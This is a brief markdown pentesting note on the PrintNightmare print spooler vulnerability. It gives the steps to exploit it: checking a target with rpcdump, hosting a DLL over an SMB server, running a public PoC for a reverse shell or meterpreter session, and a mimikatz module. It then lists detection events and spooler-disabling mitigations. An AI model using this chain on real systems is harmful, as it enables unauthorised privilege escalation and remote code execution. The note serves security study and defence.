# Print Nightmare * Privilege Escalation using Print Spooler Service * Located at `C:\Windows\System32\spoolsv.exe` * Enabled by default * [CVE-2021-1675](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1675) (locally exploitable) and [CVE-2021-34527](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527) (RCE) are both related to the print spooler * RCE connection is done via [DCE/RPC](https://wiki.wireshark.org/DCE/RPC). Use of `RpcAddPrinterDriver` or `RpcAddPrinterDriverEx` ## Usage * Prepare reverse shell * Check if target would be vulnerable ```sh rpcdump.py @$TARGET_IP | grep -e 'MS-RPRN|MS-PAR' ``` * Execute smb server ```sh smbserver.py share . -smb2support ``` * Execute PoC with credentials to elevate ```sh python CVE-2021-1675.py /:@$TARGET_IP ``` * Use the meterpreter session ### Mimikatz * Printnightmare modules of mimikatz ```sh misc::printnightmare /target: /authuser: /authpassword: /library:\\\path\to\printnightmare.dll ``` ## IOCs * `pcAddPrinterDriverEx()` is called * [Sygnia](https://www.sygnia.co/demystifying-the-printnightmare-vulnerability) explains them * [Splunk queries](https://www.splunk.com/en_us/blog/security/i-pity-the-spool-detecting-printnightmare-cve-2021-34527.html) * Logs are `Microsoft-Windows-PrintService/Admin` and `Microsoft-Windows-PrintService/Operational` * Event Ids `316, 808, 811, 31017, 7031` ## Mitigation * [link](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527) * Stop and disable ```sh Stop-Service -Name Spooler -Force Set-Service -Name Spooler -StartupType Disabled ``` * Disable group policy ```sh Computer Configuration/Administrative Templates/Printers ```